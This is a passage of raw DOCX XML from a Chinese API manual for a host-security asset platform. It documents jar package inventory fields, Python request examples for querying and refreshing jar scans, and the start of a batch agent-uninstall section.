            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A0A454" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="362B3DAA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28E2AEA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B51F55C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="323E9DF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="273EFAE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="091F965D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33E977E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EA8B367" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48F746E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="516775D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3456B16F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BD8338C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503E3975" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E2F0ECC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E57AB62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7636C969" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CE1B946" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A8DBD58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AA5D02E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36304E40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78979399" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ED9AB05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F82AB9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02FEAD36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F4797CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5321E31C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A065CB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11202710" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19873BF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74148AE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="309151C1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56129AB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C532E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="023E56AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C9022BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>包名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7785C1A7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51FA2038" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03B2ECA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="022D49CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E7487AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="708EFD72" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61631149" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="309B13D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4854A4F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7248DE8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="106360AA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="389DF507" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ECDD5B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="598C0ACB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C86F49F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否可执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="62322F27" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F80189F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="003D74D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50B71C5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC7FC99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>绝对路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A47E680" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux-jar安装包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73629596" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def jar_pkg_linux():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/jar_pkg/linux?name=ibmsaslprovider.jar&amp;executable=false&amp;version=8.0&amp;type=2&amp;path=/opt/IBM/WebSphere/AppServer/java/jre/lib/ext/ibmsaslprovider.jar" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'name': 'ibmsaslprovider.jar', 'executable': 'false', 'version': '8.0', 'type': 2, 'path': '/opt/IBM/WebSphere/AppServer/java/jre/lib/ext/ibmsaslprovider.jar'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28119A93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="身份认证">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>身份认证</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4663AF47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="jar包信息扫描"/>
      <w:bookmarkEnd w:id="77"/>
      <w:r>
        <w:t>jar包信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79480145" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求jar包信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A65A309" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C6A90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/jar_pkg/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B00C512" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57950433" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF0F5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D3FC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/jar_pkg/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D4525D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6168A5E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B19352" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656D62B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306FF918"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23994FB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2B3CA8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="566EBCAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7148DB76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13183AED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69F8746C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B941378" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ABBC354" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60413419" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="407880F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B973443" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux-jar包信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BCF728" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def refresh():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/jar_pkg/linux/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5662AD72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="jar包信息查询扫描状态"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r>
        <w:t>jar包信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A4C841" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询jar包信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A33749" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="批量卸载agent"/>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkEnd w:id="79"/>
      <w:r>
        <w:t>批量卸载Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8CC4E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596AECDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于批量卸载指定agent或者批量卸载离线超过七天的agent；您可以灵活的使用该API进行Agent卸载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760DF2C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1027152F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>卸载主机有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466466BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>指定AgentId卸载；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C6697B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>批量卸载离线超过７天的主机。</w:t>
      </w:r>
    </w:p>
